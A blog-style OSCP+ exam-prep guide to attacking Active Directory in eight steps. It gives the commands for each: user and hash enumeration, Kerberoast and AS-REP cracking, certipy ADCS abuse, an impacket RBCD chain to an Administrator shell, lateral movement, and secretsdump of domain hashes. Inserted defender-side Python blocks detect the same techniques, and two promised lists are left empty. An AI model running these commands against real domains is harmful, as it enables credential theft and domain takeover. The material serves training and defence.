OSCP+ March 2026 · 11 min read

OSCP+ AD methodology: what changed since the 2024 refresh

The "spray creds and hope" days are over. After the November 2024 refresh, the OSCP+ AD set is now structurally identical to a real internal engagement. Here's the playbook I use, in the order I run it.

What actually changed in the 2024 refresh

OffSec's official line is that the rebrand to "OSCP+" reflects "evolving real-world penetration testing." In practice, three things changed about the AD section that you need to take seriously:

  1. Active Directory is no longer optional. The 40-point AD set is now mandatory; you can no longer pass on standalone machines alone, as the old format allowed.
  2. Bonus points for lab grinding alone are gone; there is now a renewal cycle every 3 years that rewards continuous practice.
  3. The AD chain is more realistic. Expect Kerberoast, AS-REP, and ACL abuse to feature; expect at least one misconfigured ADCS template; expect at least one constrained delegation pivot.

You're not memorising tricks anymore. You're running a process.

The process, in order

Every AD set I've solved (lab + retake + my own homelab) has fallen to the same eight-step loop. I run it in this exact order, with a checkbox per step. If you skip ahead and the easy stuff is missing, you'll spend an hour debugging a hard exploit that wasn't necessary.

Step 1 · Foothold confirmed → enumerate as user

You've already popped a box and have credentials for a user. Don't open BloodHound yet. Run these first:

$ nxc smb DC01 -u user -p 'Pass' --shares
$ nxc smb DC01 -u user -p 'Pass' --pass-pol
$ nxc smb DC01 -u user -p 'Pass' --users
$ nxc smb DC01 -u user -p 'Pass' --groups
$ nxc ldap DC01 -u user -p 'Pass' --asreproast asrep.txt
$ nxc ldap DC01 -u user -p 'Pass' --kerberoasting kerb.txt

You now know the password policy (do not lock out accounts during a spray), the user list, the group list, and you've already collected every kerberoastable / AS-REP-roastable hash in a single shot.

Step 2 · Crack everything you can, in parallel

$ hashcat -m 18200 asrep.txt rockyou.txt -r best64.rule &
$ hashcat -m 13100 kerb.txt rockyou.txt -r best64.rule &
$ wait

While they crack, move on to step 3 - don't sit idle.

Step 3 · BloodHound (collect now, analyse later)

$ bloodhound-python -u user -p 'Pass' -d corp.local \
    -ns 10.10.10.10 -c All --zip
$ cp *.zip ~/bloodhound/import/

While BloodHound ingests, scope the four queries that matter on day one:

Step 4 · ADCS sweep

$ certipy find -u user -p 'Pass' -dc-ip 10.10.10.10 -vulnerable -stdout

If you see any of ESC1, ESC2, ESC3, ESC4, ESC8, ESC9 - stop everything else. ADCS misconfigurations are the fastest path to DA on the exam when present. Memorise the matrix:

Misconfig   What it lets you do                     Tool
ESC1        Enroll as anyone via SAN                certipy req --upn admin@corp.local
ESC2        Any-purpose template & enroll right     Same as ESC1, with EKU bypass
ESC3        Enrollment Agent template               Issue cert on behalf of someone
ESC4        Vulnerable ACL on template              Modify template to ESC1, then exploit
ESC6        EDITF_ATTRIBUTESUBJECTALTNAME2 flag     SAN abuse across all templates
ESC8        NTLM relay to HTTP enrollment           ntlmrelayx --adcs
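The matrix above is what certipy find -vulnerable checks for you; as an added example (not the post's or certipy's code), here is the same ESC1/ESC2/ESC3/ESC4 logic written as a defender's template audit. The template records are constructed dicts, and the key names (name_flags, enrollment_flags, ra_signatures, ekus, enroll, write) are this example's own simplification of the LDAP attributes.

```python
# Added example, not from the post: audit AD CS template settings for the
# ESC1/ESC2/ESC3/ESC4 conditions so they can be fixed before an exam-style
# attacker finds them. Template records are CONSTRUCTED dicts; key names are
# this example's own simplification of the real LDAP attributes.

CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1   # msPKI-Certificate-Name-Flag: requester picks the SAN
CT_FLAG_PEND_ALL_REQUESTS = 0x2           # msPKI-Enrollment-Flag: CA manager must approve

EKU_CLIENT_AUTH = "1.3.6.1.5.5.7.3.2"
EKU_SMARTCARD_LOGON = "1.3.6.1.4.1.311.20.2.2"
EKU_PKINIT_CLIENT = "1.3.6.1.5.2.3.4"
EKU_ANY_PURPOSE = "2.5.29.37.0"
EKU_CERT_REQUEST_AGENT = "1.3.6.1.4.1.311.20.2.1"
AUTH_EKUS = {EKU_CLIENT_AUTH, EKU_SMARTCARD_LOGON, EKU_PKINIT_CLIENT, EKU_ANY_PURPOSE}
LOW_PRIV = {"Domain Users", "Authenticated Users", "Domain Computers", "Everyone"}

def audit_template(t):
    """Return the ESC findings (in matrix order) for one template dict."""
    findings = []
    ekus = set(t["ekus"])
    low_priv_enroll = bool(LOW_PRIV & set(t["enroll"]))
    no_gate = not (t["enrollment_flags"] & CT_FLAG_PEND_ALL_REQUESTS) and t["ra_signatures"] == 0
    supplies_subject = bool(t["name_flags"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)
    any_purpose = not ekus or EKU_ANY_PURPOSE in ekus   # an empty EKU list also means any purpose
    if low_priv_enroll and no_gate:
        if supplies_subject and (any_purpose or ekus & AUTH_EKUS):
            findings.append("ESC1")
        if any_purpose:
            findings.append("ESC2")
        if EKU_CERT_REQUEST_AGENT in ekus:
            findings.append("ESC3")
    if LOW_PRIV & set(t["write"]):
        findings.append("ESC4")   # low-priv write rights: template can be rewritten into ESC1
    return findings

def audit(templates):
    """Map template name -> findings, keeping only templates that have at least one."""
    out = {}
    for t in templates:
        if f := audit_template(t):
            out[t["name"]] = f
    return out

# Constructed sample: a weak template, its hardened twin, and an over-permissive one.
TEMPLATES = [
    {"name": "UserLegacy", "name_flags": 0x1, "enrollment_flags": 0x0, "ra_signatures": 0,
     "ekus": [EKU_CLIENT_AUTH], "enroll": ["Domain Users"], "write": ["Domain Admins"]},
    {"name": "UserFixed", "name_flags": 0x0, "enrollment_flags": 0x2, "ra_signatures": 0,
     "ekus": [EKU_CLIENT_AUTH], "enroll": ["Domain Users"], "write": ["Domain Admins"]},
    {"name": "AnyPurpose", "name_flags": 0x0, "enrollment_flags": 0x0, "ra_signatures": 0,
     "ekus": [EKU_ANY_PURPOSE], "enroll": ["Authenticated Users"], "write": ["Domain Users"]},
]
```

UserFixed shows the two cheapest remediations for ESC1: clear the enrollee-supplies-subject flag and require manager approval.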

Step 5 · Targeted Kerberoast on high-value SPNs

You already pulled everyone's kerberoast hashes in step 1. Now look in BloodHound for SPNs on accounts in privileged groups (Domain Admins, Account Operators, Server Operators, Backup Operators) and prioritise those crackable hashes first. If there's a SQL_admin or similar service account in a privileged group with a weak password, you usually win there.
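Seen from the blue side of the same Step 1 collection and Step 5 prioritisation, both roasts leave a distinctive trace in the DC's Security log. The following is an added example (not from the post) that runs that detection over a constructed, simplified rendering of events 4768 and 4769; real EVTX field names differ.

```python
# Added example, not from the post: defender-side detection for the two collections
# Step 1 runs in one shot (--asreproast, --kerberoasting) and Step 5 prioritises.
# SAMPLE_LOG is a CONSTRUCTED, simplified rendering of Security events 4768 (TGT
# request) and 4769 (service-ticket request); real EVTX field names differ.
RC4_HMAC = "0x17"        # etype 23: the encryption type roasting tools request
NOISY_THRESHOLD = 3      # distinct SPN accounts from one client before we alert

SAMPLE_LOG = """
4768 time=10:01:01 user=svc_legacy ip=10.10.14.5 enc=0x17 preauth=0
4768 time=10:01:01 user=alice ip=10.10.10.50 enc=0x12 preauth=2
4769 time=10:01:02 user=user@CORP.LOCAL svc=sql_admin ip=10.10.14.5 enc=0x17
4769 time=10:01:02 user=user@CORP.LOCAL svc=backup_svc ip=10.10.14.5 enc=0x17
4769 time=10:01:02 user=user@CORP.LOCAL svc=web_svc ip=10.10.14.5 enc=0x17
4769 time=10:01:03 user=user@CORP.LOCAL svc=DC01$ ip=10.10.14.5 enc=0x12
4769 time=10:05:00 user=alice@CORP.LOCAL svc=krbtgt ip=10.10.10.50 enc=0x17
"""

def parse_events(text):
    """Turn 'EVENTID k=v k=v ...' lines into dicts carrying an 'id' key."""
    events = []
    for line in text.strip().splitlines():
        event_id, *fields = line.split()
        rec = {"id": event_id}
        for field in fields:
            key, _, value = field.partition("=")
            rec[key] = value
        events.append(rec)
    return events

def is_kerberoast_request(e):
    # RC4 service ticket for a user account: machine ('$') accounts and krbtgt
    # are not what --kerberoasting collects
    return (e["id"] == "4769" and e["enc"] == RC4_HMAC
            and not e["svc"].endswith("$") and e["svc"].lower() != "krbtgt")

def is_asrep_roast_request(e):
    # TGT issued without pre-authentication, only possible when DONT_REQ_PREAUTH
    # is set on the account, which is exactly what --asreproast harvests
    return e["id"] == "4768" and e["preauth"] == "0"

def detect_roasting(events):
    """Return per-technique hits plus clients that pulled many SPNs at once."""
    kerberoast = [e for e in events if is_kerberoast_request(e)]
    asrep = [e for e in events if is_asrep_roast_request(e)]
    spns_by_client = {}
    for e in kerberoast:
        spns_by_client.setdefault(e["ip"], set()).add(e["svc"])
    noisy = sorted(ip for ip, s in spns_by_client.items() if len(s) >= NOISY_THRESHOLD)
    return {"kerberoast": kerberoast, "asrep": asrep, "noisy_clients": noisy}
```

The burst of RC4 service-ticket requests from one client is the signature of the single-shot collection; the fix on the account side is AES-only service accounts with long passwords (or gMSAs) and no DONT_REQ_PREAUTH.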

Step 6 · ACL abuse (the under-used one)

The exam loves to plant a juicy ACL. Look for:

# Resource-Based Constrained Delegation (RBCD) - when you have GenericAll on a target machine
$ impacket-addcomputer -computer-name 'fake$' -computer-pass 'P@ss123' \
    -dc-ip 10.10.10.10 'corp.local/user:Pass'

$ impacket-rbcd -delegate-to TARGET\$ -delegate-from 'fake$' \
    -action write -dc-ip 10.10.10.10 'corp.local/user:Pass'

$ impacket-getST -spn cifs/TARGET.corp.local \
    -impersonate Administrator \
    'corp.local/fake$:P@ss123' -dc-ip 10.10.10.10

$ export KRB5CCNAME=Administrator.ccache
$ impacket-psexec -k -no-pass TARGET.corp.local
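The addcomputer then rbcd sequence above writes to the directory twice, and both writes are logged. As an added example (not from the post), here is correlation logic that pairs them; the events are constructed dicts modelled loosely on Security events 4741 and 5136, and the key names are this example's own.

```python
# Added example, not from the post: correlate the two directory writes the RBCD
# chain in Step 6 leaves behind, so a defender can catch it. EVENTS are CONSTRUCTED
# dicts modelled loosely on Security events 4741 (computer account created) and
# 5136 (directory object modified); the key names are this example's own.
from datetime import datetime, timedelta

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"
WINDOW = timedelta(minutes=30)
ADMIN_GROUPS = {"Domain Admins", "Enterprise Admins"}

def nonadmin_rbcd_writes(events):
    """Every RBCD attribute write by a principal outside ADMIN_GROUPS; each one is
    worth a ticket on its own, chain or not."""
    return [e for e in events
            if e["id"] == 5136 and e["attr"] == RBCD_ATTR and not (e["by_groups"] & ADMIN_GROUPS)]

def find_rbcd_chains(events):
    """Pair each suspicious RBCD write with a computer account the same actor created
    within WINDOW before it (the addcomputer -> rbcd sequence).
    Returns (actor, new computer, delegation target) tuples."""
    created = [e for e in events if e["id"] == 4741]
    chains = []
    for w in nonadmin_rbcd_writes(events):
        for c in created:
            gap = datetime.fromisoformat(w["time"]) - datetime.fromisoformat(c["time"])
            if c["by"] == w["by"] and timedelta(0) <= gap <= WINDOW:
                chains.append((w["by"], c["object"], w["object"]))
    return chains

# Constructed sample: one attacker-style sequence, one legitimate admin change,
# and an unrelated attribute write by the same low-privilege user.
USER = {"by": "CORP\\user", "by_groups": {"Domain Users"}}
EVENTS = [
    {"id": 4741, "time": "2026-03-01T10:00:00", "object": "FAKE$", **USER},
    {"id": 5136, "time": "2026-03-01T10:02:00", "object": "TARGET$", "attr": RBCD_ATTR, **USER},
    {"id": 5136, "time": "2026-03-01T10:03:00", "object": "TARGET$", "attr": "description", **USER},
    {"id": 5136, "time": "2026-03-01T11:00:00", "object": "WEB01$", "attr": RBCD_ATTR,
     "by": "CORP\\admin", "by_groups": {"Domain Admins"}},
]
```

Setting ms-DS-MachineAccountQuota to 0 on the domain takes the first step of this chain away from ordinary users; 5136 only fires if auditing of directory service changes is enabled and the computer objects carry a SACL for attribute writes.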

Step 7 · Lateral movement, in the right order

Default move order I follow once a target is reachable:

  1. nxc smb TARGET -u USER -p PASS - confirm auth works
  2. nxc smb TARGET -u USER -p PASS --shares - any writeable share?
  3. impacket-wmiexec USER:PASS@TARGET - clean execution, less noisy than psexec
  4. evil-winrm -i TARGET -u USER -p PASS - if WinRM is open, prefer this
  5. impacket-psexec USER:PASS@TARGET - last resort, drops a service

Step 8 · DA → krbtgt → cleanup

Once you have a DA hash, dump NTDS.dit:

$ impacket-secretsdump -hashes :HASH 'corp.local/admin@DC01'

Save the output. Take screenshots of the output of whoami /priv on the DC, of the krbtgt hash entry, and of proof.txt on Administrator's desktop. That's how you score the AD set.

Pre-exam checklist

Closing thought

The 2024 refresh moved the OSCP+ AD set from "obscure trick" to "real methodology". That's good for the cert and good for you - what you learn transfers directly to engagements. Run the loop above on every box you touch until your fingers know it. The exam is just one more box.
